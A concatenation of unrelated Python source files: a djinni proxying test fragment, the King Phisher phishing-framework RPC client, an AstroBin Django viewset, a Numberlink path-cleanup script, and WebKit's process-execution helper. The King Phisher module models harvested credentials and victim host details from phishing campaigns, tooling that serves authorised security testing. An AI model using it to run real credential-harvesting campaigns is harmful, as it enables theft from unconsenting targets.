fr_set_get(fr, fl_cpp_2, "Goodbye")
assert lib.equal_handles_cw__foo_listener_bf(fl_cpp._cpp_impl, fl_cpp_1._cpp_impl) and \
lib.equal_handles_cw__foo_listener_bf(fl_cpp_1._cpp_impl, fl_cpp_2._cpp_impl)
fl = fl_1 = fl_2 = fl_cpp = fl_cpp_1 = fl_cpp_2 = None
gc.collect()
fr = None
gc.collect()
assert 0 == len(FooListenerBfHelper.c_data_set)
def fr_fl_set_get(fr, fl_in_fl, b):
fr.set_listener_bf_in_listener_bf(fl_in_fl)
fr.set_binary_in_listener_bf_in_listener_bf(b)
assert b == fr.get_binary_in_listener_bf_in_listener_bf(), "test_interface_back_forth failed"
# back and forth via callbacks cpp to python
def test_interface_callback_back_forth():
fr = FooReceiver.create()
fl = FooListenerBfImpl()
fr.add_listener_bf(fl)
fl_in_fl = FooListenerBfImpl()
b = b'Some Binary 11'
fr_fl_set_get(fr, fl_in_fl, b) # listener 1 in python, listener 2 in python
fl_in_fl_1 = fr.in_listener_bf_send_return(fl_in_fl)
fl_in_fl_2 = fr.in_listener_bf_send_return(fl_in_fl_1)
assert fl_in_fl == fl_in_fl_1 and fl_in_fl_1 == fl_in_fl_2, "test_interface_back_forth failed"
fr_fl_set_get(fr, fl_in_fl_2, b) # listener 1 in python, listener 2 in python after back&forth
fl_in_fl = fr.get_foo_listener_bf()
b = b'Some Other Binary 12'
fr_fl_set_get(fr, fl_in_fl, b) # listener 1 in python, listener 2 in cpp
fl_in_fl_1 = fr.in_listener_bf_send_return(fl_in_fl)
fl_in_fl_2 = fr.in_listener_bf_send_return(fl_in_fl_1)
assert lib.equal_handles_cw__foo_listener_bf(fl_in_fl._cpp_impl, fl_in_fl_1._cpp_impl) and \
lib.equal_handles_cw__foo_listener_bf(fl_in_fl_1._cpp_impl, fl_in_fl_2._cpp_impl)
fr_fl_set_get(fr, fl_in_fl_2, b) # listener 1 in python, listener 2 in cpp after back&forth
fl = fr.get_foo_listener_bf()
fr.add_listener_bf(fl)
fl_in_fl = FooListenerBfImpl()
b = b'Some Binary 21'
fr_fl_set_get(fr, fl_in_fl, b) # listener 1 in cpp, listener 2 in python
fl_in_fl_1 = fr.in_listener_bf_send_return(fl_in_fl)
fl_in_fl_2 = fr.in_listener_bf_send_return(fl_in_fl_1)
assert fl_in_fl == fl_in_fl_1 and fl_in_fl_1 == fl_in_fl_2, "test_interface_back_forth failed"
fr_fl_set_get(fr, fl_in_fl_2, b) # listener 1 in cpp, listener 2 in python after back&forth
fl_in_fl = fr.get_foo_listener_bf()
b = b'Some Other Binary 22'
fr_fl_set_get(fr, fl_in_fl, b) # listener 1 in cpp, listener 2 in cpp
fl_in_fl_1 = fr.in_listener_bf_send_return(fl_in_fl)
fl_in_fl_2 = fr.in_listener_bf_send_return(fl_in_fl_1)
assert lib.equal_handles_cw__foo_listener_bf(fl_in_fl._cpp_impl, fl_in_fl_1._cpp_impl) and \
lib.equal_handles_cw__foo_listener_bf(fl_in_fl_1._cpp_impl, fl_in_fl_2._cpp_impl)
fr_fl_set_get(fr, fl_in_fl_2, b) # listener 1 in cpp, listener 2 in cpp after back&forth
fl = fl_in_fl = fl_in_fl_1 = fl_in_fl_2 = None
gc.collect()
fr = None
gc.collect()
assert 0 == len(FooListenerBfHelper.c_data_set)
| trafi/djinni | test-suite/handwritten-src/python/test_proxying.py | Python | apache-2.0 | 5,511 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/client_rpc.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import code
import collections
import getpass
import json
import logging
import os
import sys
from king_phisher import find
from king_phisher import geoip
from king_phisher.third_party import AdvancedHTTPServer
try:
import msgpack # pylint: disable=unused-import
has_msgpack = True
"""Whether the :py:mod:`msgpack` module is available or not."""
except ImportError:
has_msgpack = False
AlertSubscription = collections.namedtuple('AlertSubscription', ('id', 'user_id', 'campaign_id'))
Campaign = collections.namedtuple('Campaign', ('id', 'name', 'user_id', 'created', 'reject_after_credentials'))
Credential = collections.namedtuple('Credential', ('id', 'visit_id', 'message_id', 'campaign_id', 'username', 'password', 'submitted'))
DeaddropConnection = collections.namedtuple('DeaddropConnection', ('id', 'deployment_id', 'campaign_id', 'visit_count', 'visitor_ip', 'local_username', 'local_hostname', 'local_ip_addresses', 'first_visit', 'last_visit'))
DeaddropDeployment = collections.namedtuple('DeaddropDeployment', ('id', 'campaign_id', 'destination'))
LandingPage = collections.namedtuple('LandingPage', ('id', 'campaign_id', 'hostname', 'page'))
Message = collections.namedtuple('Message', ('id', 'campaign_id', 'target_email', 'company_name', 'first_name', 'last_name', 'opened', 'sent', 'trained'))
MetaData = collections.namedtuple('MetaData', ('id', 'value_type', 'value'))
User = collections.namedtuple('User', ('id', 'phone_carrier', 'phone_number'))
Visit = collections.namedtuple('Visit', ('id', 'message_id', 'campaign_id', 'visit_count', 'visitor_ip', 'visitor_details', 'first_visit', 'last_visit'))
_table_row_classes = {
'alert_subscriptions': AlertSubscription,
'campaigns': Campaign,
'credentials': Credential,
'deaddrop_connections': DeaddropConnection,
'deaddrop_deployments': DeaddropDeployment,
'landing_pages': LandingPage,
'messages': Message,
'meta_data': MetaData,
'users': User,
'visits': Visit
}
class KingPhisherRPCClient(AdvancedHTTPServer.AdvancedHTTPServerRPCClientCached):
"""
The main RPC object for communicating with the King Phisher Server
over RPC.
"""
def __init__(self, *args, **kwargs):
self.logger = logging.getLogger('KingPhisher.Client.RPC')
super(KingPhisherRPCClient, self).__init__(*args, **kwargs)
if has_msgpack:
serializer = 'binary/message-pack'
else:
serializer = 'binary/json'
self.set_serializer(serializer)
def __repr__(self):
return "<{0} '{1}@{2}:{3}{4}'>".format(self.__class__.__name__, self.username, self.host, self.port, self.uri_base)
def remote_table(self, table, *args):
"""
Iterate over a remote database table hosted on the server. Rows are
yielded as named tuples whose fields are the columns of the specified
table.
:param str table: The table name to retrieve.
:return: A generator which yields rows of named tuples.
:rtype: tuple
"""
table_method = table + '/view'
table = table.rsplit('/', 1)[-1]
page = 0
args = list(args)
args.append(page)
results = self.call(table_method, *args)
results_length = len(results or '')
row_cls = _table_row_classes[table]
while results:
for row in results['rows']:
yield row_cls(*row)
if len(results) < results_length:
break
args[-1] += 1
results = self.call(table_method, *args)
def remote_table_row(self, table, row_id, cache=False, refresh=False):
"""
Get a row from the specified table by it's id, optionally cacheing it.
:param str table: The table in which the row exists.
:param row_id: The value of the row's id column.
:param bool cache: Whether to use the cache for this row.
:param bool refresh: If *cache* is True, get the current row value and store it.
:return: The remote row as a named tuple of the specified table.
:rtype: tuple
"""
table_method = table + '/get'
if cache and refresh:
row = self.cache_call_refresh(table_method, row_id)
elif cache and not refresh:
row = self.cache_call(table_method, row_id)
else:
row = self.call(table_method, row_id)
if row == None:
return None
row_cls = _table_row_classes[table]
return row_cls(**row)
def geoip_lookup(self, ip):
"""
Look up the geographic location information for the specified IP
address in the server's geoip database.
:param ip: The IP address to lookup.
:type ip: :py:class:`ipaddress.IPv4Address`, str
:return: The geographic location information for the specified IP address.
:rtype: :py:class:`~king_phisher.geoip.GeoLocation`
"""
result = self.cache_call('geoip/lookup', str(ip))
if result:
result = geoip.GeoLocation(ip, result=result)
return result
def geoip_lookup_multi(self, ips):
"""
Look up the geographic location information for the specified IP
addresses in the server's geoip database. Because results are cached
for optimal performance, IP addresses to be queried should be grouped
and sorted in a way that is unlikely to change, i.e. by a timestamp.
:param ips: The IP addresses to lookup.
:type ips: list, set, tuple
:return: The geographic location information for the specified IP address.
:rtype: dict
"""
ips = [str(ip) for ip in ips]
results = self.cache_call('geoip/lookup/multi', ips)
for ip, data in results.items():
results[ip] = geoip.GeoLocation(ip, result=data)
return results
def vte_child_routine(config):
"""
This is the method which is executed within the child process spawned
by VTE. It expects additional values to be set in the *config*
object so it can initialize a new :py:class:`.KingPhisherRPCClient`
instance. It will then drop into an interpreter where the user may directly
interact with the rpc object.
:param str config: A JSON encoded client configuration.
"""
config = json.loads(config)
try:
import readline
import rlcompleter # pylint: disable=unused-variable
except ImportError:
pass
else:
readline.parse_and_bind('tab: complete')
plugins_directory = find.find_data_directory('rpc_plugins')
if plugins_directory:
sys.path.append(plugins_directory)
rpc = KingPhisherRPCClient(**config['rpc_data'])
logged_in = False
for _ in range(0, 3):
rpc.password = getpass.getpass("{0}@{1}'s password: ".format(rpc.username, rpc.host))
try:
logged_in = rpc('ping')
except AdvancedHTTPServer.AdvancedHTTPServerRPCError:
print('Permission denied, please try again.') # pylint: disable=C0325
continue
else:
break
if not logged_in:
return
banner = "Python {0} on {1}".format(sys.version, sys.platform)
print(banner) # pylint: disable=C0325
information = "Campaign Name: '{0}' ID: {1}".format(config['campaign_name'], config['campaign_id'])
print(information) # pylint: disable=C0325
console_vars = {
'CAMPAIGN_NAME': config['campaign_name'],
'CAMPAIGN_ID': config['campaign_id'],
'os': os,
'rpc': rpc,
'sys': sys
}
export_to_builtins = ['CAMPAIGN_NAME', 'CAMPAIGN_ID', 'rpc']
console = code.InteractiveConsole(console_vars)
for var in export_to_builtins:
console.push("__builtins__['{0}'] = {0}".format(var))
console.interact('The \'rpc\' object holds the connected KingPhisherRPCClient instance')
return
| drptbl/king-phisher | king_phisher/client/client_rpc.py | Python | bsd-3-clause | 8,698 |
from django.shortcuts import get_object_or_404
from rest_framework.decorators import action
from rest_framework.parsers import MultiPartParser, FormParser
from astrobin_apps_equipment.api.filters.accessory_edit_proposal_filter import AccessoryEditProposalFilter
from astrobin_apps_equipment.api.serializers.accessory_edit_proposal_image_serializer import \
AccessoryEditProposalImageSerializer
from astrobin_apps_equipment.api.serializers.accessory_edit_proposal_serializer import AccessoryEditProposalSerializer
from astrobin_apps_equipment.api.views.equipment_item_edit_proposal_view_set import EquipmentItemEditProposalViewSet
from astrobin_apps_equipment.models.accessory_edit_proposal import AccessoryEditProposal
class AccessoryEditProposalViewSet(EquipmentItemEditProposalViewSet):
serializer_class = AccessoryEditProposalSerializer
filter_class = AccessoryEditProposalFilter
@action(
detail=True,
methods=['post'],
serializer_class=AccessoryEditProposalImageSerializer,
parser_classes=[MultiPartParser, FormParser],
)
def image(self, request, pk):
return super(AccessoryEditProposalViewSet, self).image_upload(request, pk)
@action(detail=True, methods=['POST'])
def approve(self, request, pk):
edit_proposal: AccessoryEditProposal = get_object_or_404(AccessoryEditProposal, pk=pk)
check_permissions, response = self.check_edit_proposal_permissions(request, edit_proposal)
if not check_permissions:
return response
return super().approve(request, pk)
class Meta(EquipmentItemEditProposalViewSet.Meta):
abstract = False
| astrobin/astrobin | astrobin_apps_equipment/api/views/accessory_edit_proposal_view_set.py | Python | agpl-3.0 | 1,662 |
# -*- coding: utf-8 ; mode: python -*-
#
# 冗長な線を削除する
#
# Copyright (C) 2015 Fujitsu
# Copyright (C) 2017 DA Symposium
from nlcheck import NLCheck
import numpy as np
def distance(line_mat, xmat):
"距離を数え上げる"
xd = np.full( xmat.shape, -1, np.integer ) # 距離の行列。初期値-1
# 始点の距離を0とする
for i in range(0, line_mat.shape[0]):
(x0,y0,z0, x1,y1,z1) = line_mat[i]
xd[y0+1,x0+1] = 0 # 座標が+1ずれる
update = True
while update:
update = False
for y in range(1, xd.shape[0]-1): # 座標が+1ずれる
for x in range(1, xd.shape[1]-1): # 座標が+1ずれる
num = xmat[y,x]
for p in ( (y-1,x), (y,x+1), (y,x-1), (y+1,x) ):
if num == xmat[p]: # 隣接セルが同じ数字
if xd[p] == -1: continue
dnew = xd[p] + 1
if (xd[y,x] == -1) or (dnew < xd[y,x]):
xd[y,x] = dnew # 距離を更新
update = True
return xd
def distance1(num, line_mat, xmat):
"1本の線について、空き地を通ることを許して、距離を数え上げる"
xd = np.full( xmat.shape, -1, np.integer ) # 距離の行列。初期値-1
# 始点の距離を0とする
(x0,y0,z0, x1,y1,z1) = line_mat[num-1] # 線の番号は1から始まる
xd[y0+1,x0+1] = 0 # 座標が+1ずれる
update = True
while update:
update = False
for y in range(1, xd.shape[0]-1): # 座標が+1ずれる
for x in range(1, xd.shape[1]-1): # 座標が+1ずれる
if not (xmat[y,x] in (num, 0)): continue
for p in ( (y-1,x), (y,x+1), (y,x-1), (y+1,x) ):
dnew = xd[p] + 1
if xmat[p] == num or True: #???
if xd[p] == -1: continue
dnew = xd[p] + 1
if (xd[y,x] == -1) or (dnew < xd[y,x]):
xd[y,x] = dnew # 距離を更新
update = True
return xd
def min_route(line_mat, xmat, xd):
# 終点から最短距離をたどって始点に戻る
xkeep = np.zeros( xd.shape, np.integer )
# foundは、線ごとの、今までに見つかった最短距離
found = np.zeros( line_mat.shape[0]+1, np.integer ) # 線の番号は1から始まるので+1
for i in range(0, line_mat.shape[0]):
(x0,y0,z0, x1,y1,z1) = line_mat[i]
xkeep[y1+1,x1+1] = 1 # 座標が+1ずれる
found[i+1] = xd[y1+1,x1+1] # 初期値
update = True
while update:
update = False
for y in range(1, xd.shape[0]-1): # 座標が+1ずれる
for x in range(1, xd.shape[1]-1): # 座標が+1ずれる
if xkeep[y,x] == 0: continue
#今いるのは、keepセル
#最短経路となるセルを探す
pmin = None
xdmin = found[xmat[y,x]] # 初期値は、現時点での最短距離
for p in ( (y-1,x), (y,x+1), (y,x-1), (y+1,x) ):
if xmat[y,x] != xmat[p]: continue
# 隣接セルは同じ数値である
if xkeep[p] == 0 and xd[p] < xdmin:
xdmin = xd[p]
pmin = p
if pmin is not None:
xkeep[pmin] = 1
found[xmat[pmin]] = xd[pmin]
update = True
return xkeep
def min_route1(num, line_mat, xmat, xd):
# 終点から最短距離をたどって始点に戻る
xkeep = np.zeros( xd.shape, np.integer )
# foundは、線ごとの、今までに見つかった最短距離
found = np.zeros( line_mat.shape[0]+1, np.integer ) # 線の番号は1から始まるので+1
(x0,y0,z0, x1,y1,z1) = line_mat[num-1]
xkeep[y1+1,x1+1] = 1 # 座標が+1ずれる
found[num] = xd[y1+1,x1+1] # 初期値
update = True
while update:
update = False
for y in range(1, xd.shape[0]-1): # 座標が+1ずれる
for x in range(1, xd.shape[1]-1): # 座標が+1ずれる
if xkeep[y,x] == 0: continue
#今いるのは、keepセル
#最短経路となるセルを探す
pmin = None
xdmin = found[num] # 初期値は、現時点での最短距離
for p in ( (y-1,x), (y,x+1), (y,x-1), (y+1,x) ):
if not (xmat[p] in (num, 0)): continue
# 隣接セルは同じ数値か、空き地である
if xkeep[p] == 0 and xd[p] != -1 and xd[p] < xdmin:
xdmin = xd[p]
pmin = p
if pmin is not None:
xkeep[pmin] = 1
found[num] = xd[pmin]
update = True
return xkeep
def clean(line_mat, xmat):
"枝分かれしている、冗長部分を削除"
xd = distance(line_mat, xmat)
xkeep = min_route(line_mat, xmat, xd)
xmat2 = xmat * xkeep
return xmat2
def short_cut(line_mat, xmat2):
"迂回している個所を、より短い経路になるように、引き直す"
xmat3 = np.array(xmat2) # コピーする
for num0 in range(0, line_mat.shape[0]):
num = num0 + 1
xd2 = distance1(num, line_mat, xmat3)
xkeep2 = min_route1(num, line_mat, xmat3, xd2)
# もともとnumのセルを空白にして、
xmat3[xmat3==num] = 0
# xkeep2の位置に、numの線を引き直す
xmat3 += xkeep2*(num)
return xmat3
| dasadc/conmgr | server/nlclean.py | Python | bsd-3-clause | 5,834 |
# Copyright (c) 2009, Google Inc. All rights reserved.
# Copyright (c) 2009 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import errno
import logging
import multiprocessing
import os
import StringIO
import signal
import subprocess
import sys
import time
from webkitpy.common.system.outputtee import Tee
from webkitpy.common.system.filesystem import FileSystem
_log = logging.getLogger(__name__)
class ScriptError(Exception):
def __init__(self,
message=None,
script_args=None,
exit_code=None,
output=None,
cwd=None):
if not message:
message = 'Failed to run "%s"' % repr(script_args)
if exit_code:
message += " exit_code: %d" % exit_code
if cwd:
message += " cwd: %s" % cwd
Exception.__init__(self, message)
self.script_args = script_args # 'args' is already used by Exception
self.exit_code = exit_code
self.output = output
self.cwd = cwd
def message_with_output(self, output_limit=500):
if self.output:
if output_limit and len(self.output) > output_limit:
return u"%s\n\nLast %s characters of output:\n%s" % \
(self, output_limit, self.output[-output_limit:])
return u"%s\n\n%s" % (self, self.output)
return unicode(self)
def command_name(self):
command_path = self.script_args
if type(command_path) is list:
command_path = command_path[0]
return os.path.basename(command_path)
class Executive(object):
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
def _should_close_fds(self):
# We need to pass close_fds=True to work around Python bug #2320
# (otherwise we can hang when we kill DumpRenderTree when we are running
# multiple threads). See http://bugs.python.org/issue2320 .
# Note that close_fds isn't supported on Windows, but this bug only
# shows up on Mac and Linux.
return sys.platform not in ('win32', 'cygwin')
def _run_command_with_teed_output(self, args, teed_output, **kwargs):
child_process = self.popen(args,
stdout=self.PIPE,
stderr=self.STDOUT,
close_fds=self._should_close_fds(),
**kwargs)
# Use our own custom wait loop because Popen ignores a tee'd
# stderr/stdout.
# FIXME: This could be improved not to flatten output to stdout.
while True:
output_line = child_process.stdout.readline()
if output_line == "" and child_process.poll() != None:
# poll() is not threadsafe and can throw OSError due to:
# http://bugs.python.org/issue1731717
return child_process.poll()
# We assume that the child process wrote to us in utf-8,
# so no re-encoding is necessary before writing here.
teed_output.write(output_line)
# FIXME: Remove this deprecated method and move callers to run_command.
# FIXME: This method is a hack to allow running command which both
# capture their output and print out to stdin. Useful for things
# like "build-webkit" where we want to display to the user that we're building
# but still have the output to stuff into a log file.
def run_and_throw_if_fail(self, args, quiet=False, decode_output=True, **kwargs):
# Cache the child's output locally so it can be used for error reports.
child_out_file = StringIO.StringIO()
tee_stdout = sys.stdout
if quiet:
dev_null = open(os.devnull, "w") # FIXME: Does this need an encoding?
tee_stdout = dev_null
child_stdout = Tee(child_out_file, tee_stdout)
exit_code = self._run_command_with_teed_output(args, child_stdout, **kwargs)
if quiet:
dev_null.close()
child_output = child_out_file.getvalue()
child_out_file.close()
if decode_output:
child_output = child_output.decode(self._child_process_encoding())
if exit_code:
raise ScriptError(script_args=args,
exit_code=exit_code,
output=child_output)
return child_output
def cpu_count(self):
try:
cpus = int(os.environ.get('NUMBER_OF_PROCESSORS'))
if cpus > 0:
return cpus
except (ValueError, TypeError):
pass
return multiprocessing.cpu_count()
@staticmethod
def interpreter_for_script(script_path, fs=None):
fs = fs or FileSystem()
lines = fs.read_text_file(script_path).splitlines()
if not len(lines):
return None
first_line = lines[0]
if not first_line.startswith('#!'):
return None
if first_line.find('python') > -1:
return sys.executable
if first_line.find('perl') > -1:
return 'perl'
if first_line.find('ruby') > -1:
return 'ruby'
return None
@staticmethod
def shell_command_for_script(script_path, fs=None):
fs = fs or FileSystem()
# Win32 does not support shebang. We need to detect the interpreter ourself.
if sys.platform == 'win32':
interpreter = Executive.interpreter_for_script(script_path, fs)
if interpreter:
return [interpreter, script_path]
return [script_path]
def kill_process(self, pid):
"""Attempts to kill the given pid.
Will fail silently if pid does not exist or insufficient permisssions."""
if sys.platform == "win32":
# We only use taskkill.exe on windows (not cygwin) because subprocess.pid
# is a CYGWIN pid and taskkill.exe expects a windows pid.
# Thankfully os.kill on CYGWIN handles either pid type.
command = ["taskkill.exe", "/f", "/pid", pid]
# taskkill will exit 128 if the process is not found. We should log.
self.run_command(command, error_handler=self.ignore_error)
return
# According to http://docs.python.org/library/os.html
# os.kill isn't available on Windows. python 2.5.5 os.kill appears
# to work in cygwin, however it occasionally raises EAGAIN.
retries_left = 10 if sys.platform == "cygwin" else 1
while retries_left > 0:
try:
retries_left -= 1
os.kill(pid, signal.SIGKILL)
_ = os.waitpid(pid, os.WNOHANG)
except OSError, e:
if e.errno == errno.EAGAIN:
if retries_left <= 0:
_log.warn("Failed to kill pid %s. Too many EAGAIN errors." % pid)
continue
if e.errno == errno.ESRCH: # The process does not exist.
return
if e.errno == errno.EPIPE: # The process has exited already on cygwin
return
if e.errno == errno.ECHILD:
# Can't wait on a non-child process, but the kill worked.
return
if e.errno == errno.EACCES and sys.platform == 'cygwin':
# Cygwin python sometimes can't kill native processes.
return
raise
def _win32_check_running_pid(self, pid):
# importing ctypes at the top-level seems to cause weird crashes at
# exit under cygwin on apple's win port. Only win32 needs cygwin, so
# we import it here instead. See https://bugs.webkit.org/show_bug.cgi?id=91682
import ctypes
class PROCESSENTRY32(ctypes.Structure):
_fields_ = [("dwSize", ctypes.c_ulong),
("cntUsage", ctypes.c_ulong),
("th32ProcessID", ctypes.c_ulong),
("th32DefaultHeapID", ctypes.POINTER(ctypes.c_ulong)),
("th32ModuleID", ctypes.c_ulong),
("cntThreads", ctypes.c_ulong),
("th32ParentProcessID", ctypes.c_ulong),
("pcPriClassBase", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("szExeFile", ctypes.c_char * 260)]
CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot
Process32First = ctypes.windll.kernel32.Process32First
Process32Next = ctypes.windll.kernel32.Process32Next
CloseHandle = ctypes.windll.kernel32.CloseHandle
TH32CS_SNAPPROCESS = 0x00000002 # win32 magic number
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
pe32 = PROCESSENTRY32()
pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
result = False
if not Process32First(hProcessSnap, ctypes.byref(pe32)):
_log.debug("Failed getting first process.")
CloseHandle(hProcessSnap)
return result
while True:
if pe32.th32ProcessID == pid:
result = True
break
if not Process32Next(hProcessSnap, ctypes.byref(pe32)):
break
CloseHandle(hProcessSnap)
return result
def check_running_pid(self, pid):
"""Return True if pid is alive, otherwise return False."""
if sys.platform == 'win32':
return self._win32_check_running_pid(pid)
try:
os.kill(pid, 0)
return True
except OSError:
return False
def running_pids(self, process_name_filter=None):
if not process_name_filter:
process_name_filter = lambda process_name: True
running_pids = []
if sys.platform in ("win32", "cygwin"):
# FIXME: running_pids isn't implemented on Windows yet...
return []
ps_process = self.popen(['ps', '-eo', 'pid,comm'], stdout=self.PIPE, stderr=self.PIPE)
stdout, _ = ps_process.communicate()
for line in stdout.splitlines():
try:
# In some cases the line can contain one or more
# leading white-spaces, so strip it before split.
pid, process_name = line.strip().split(' ', 1)
if process_name_filter(process_name):
running_pids.append(int(pid))
except ValueError, e:
pass
return sorted(running_pids)
def wait_newest(self, process_name_filter=None):
if not process_name_filter:
process_name_filter = lambda process_name: True
running_pids = self.running_pids(process_name_filter)
if not running_pids:
return
pid = running_pids[-1]
while self.check_running_pid(pid):
time.sleep(0.25)
def wait_limited(self, pid, limit_in_seconds=None, check_frequency_in_seconds=None):
seconds_left = limit_in_seconds or 10
sleep_length = check_frequency_in_seconds or 1
while seconds_left > 0 and self.check_running_pid(pid):
seconds_left -= sleep_length
time.sleep(sleep_length)
def _windows_image_name(self, process_name):
name, extension = os.path.splitext(process_name)
if not extension:
# taskkill expects processes to end in .exe
# If necessary we could add a flag to disable appending .exe.
process_name = "%s.exe" % name
return process_name
def interrupt(self, pid):
interrupt_signal = signal.SIGINT
# FIXME: The python docs seem to imply that platform == 'win32' may need to use signal.CTRL_C_EVENT
# http://docs.python.org/2/library/signal.html
try:
os.kill(pid, interrupt_signal)
except OSError:
# Silently ignore when the pid doesn't exist.
# It's impossible for callers to avoid race conditions with process shutdown.
pass
def kill_all(self, process_name):
"""Attempts to kill processes matching process_name.
Will fail silently if no process are found."""
if sys.platform in ("win32", "cygwin"):
image_name = self._windows_image_name(process_name)
command = ["taskkill.exe", "/f", "/im", image_name]
# taskkill will exit 128 if the process is not found. We should log.
self.run_command(command, error_handler=self.ignore_error)
return
# FIXME: This is inconsistent that kill_all uses TERM and kill_process
# uses KILL. Windows is always using /f (which seems like -KILL).
# We should pick one mode, or add support for switching between them.
# Note: Mac OS X 10.6 requires -SIGNALNAME before -u USER
command = ["killall", "-TERM", "-u", os.getenv("USER"), process_name]
# killall returns 1 if no process can be found and 2 on command error.
# FIXME: We should pass a custom error_handler to allow only exit_code 1.
# We should log in exit_code == 1
self.run_command(command, error_handler=self.ignore_error)
# Error handlers do not need to be static methods once all callers are
# updated to use an Executive object.
@staticmethod
def default_error_handler(error):
raise error
@staticmethod
def ignore_error(error):
pass
def _compute_stdin(self, input):
"""Returns (stdin, string_to_communicate)"""
# FIXME: We should be returning /dev/null for stdin
# or closing stdin after process creation to prevent
# child processes from getting input from the user.
if not input:
return (None, None)
if hasattr(input, "read"): # Check if the input is a file.
return (input, None) # Assume the file is in the right encoding.
# Popen in Python 2.5 and before does not automatically encode unicode objects.
# http://bugs.python.org/issue5290
# See https://bugs.webkit.org/show_bug.cgi?id=37528
# for an example of a regresion caused by passing a unicode string directly.
# FIXME: We may need to encode differently on different platforms.
if isinstance(input, unicode):
input = input.encode(self._child_process_encoding())
return (self.PIPE, input)
def command_for_printing(self, args):
"""Returns a print-ready string representing command args.
The string should be copy/paste ready for execution in a shell."""
args = self._stringify_args(args)
escaped_args = []
for arg in args:
if isinstance(arg, unicode):
# Escape any non-ascii characters for easy copy/paste
arg = arg.encode("unicode_escape")
# FIXME: Do we need to fix quotes here?
escaped_args.append(arg)
return " ".join(escaped_args)
# FIXME: run_and_throw_if_fail should be merged into this method.
def run_command(self,
args,
cwd=None,
env=None,
input=None,
error_handler=None,
return_exit_code=False,
return_stderr=True,
decode_output=True):
"""Popen wrapper for convenience and to work around python bugs."""
assert(isinstance(args, list) or isinstance(args, tuple))
start_time = time.time()
stdin, string_to_communicate = self._compute_stdin(input)
stderr = self.STDOUT if return_stderr else None
process = self.popen(args,
stdin=stdin,
stdout=self.PIPE,
stderr=stderr,
cwd=cwd,
env=env,
close_fds=self._should_close_fds())
output = process.communicate(string_to_communicate)[0]
# run_command automatically decodes to unicode() unless explicitly told not to.
if decode_output:
output = output.decode(self._child_process_encoding())
# wait() is not threadsafe and can throw OSError due to:
# http://bugs.python.org/issue1731717
exit_code = process.wait()
_log.debug('"%s" took %.2fs' % (self.command_for_printing(args), time.time() - start_time))
if return_exit_code:
return exit_code
if exit_code:
script_error = ScriptError(script_args=args,
exit_code=exit_code,
output=output,
cwd=cwd)
(error_handler or self.default_error_handler)(script_error)
return output
def _child_process_encoding(self):
# Win32 Python 2.x uses CreateProcessA rather than CreateProcessW
# to launch subprocesses, so we have to encode arguments using the
# current code page.
if sys.platform == 'win32' and sys.version < '3':
return 'mbcs'
# All other platforms use UTF-8.
# FIXME: Using UTF-8 on Cygwin will confuse Windows-native commands
# which will expect arguments to be encoded using the current code
# page.
return 'utf-8'
def _should_encode_child_process_arguments(self):
# Cygwin's Python's os.execv doesn't support unicode command
# arguments, and neither does Cygwin's execv itself.
if sys.platform == 'cygwin':
return True
# Win32 Python 2.x uses CreateProcessA rather than CreateProcessW
# to launch subprocesses, so we have to encode arguments using the
# current code page.
if sys.platform == 'win32' and sys.version < '3':
return True
return False
def _encode_argument_if_needed(self, argument):
if not self._should_encode_child_process_arguments():
return argument
return argument.encode(self._child_process_encoding())
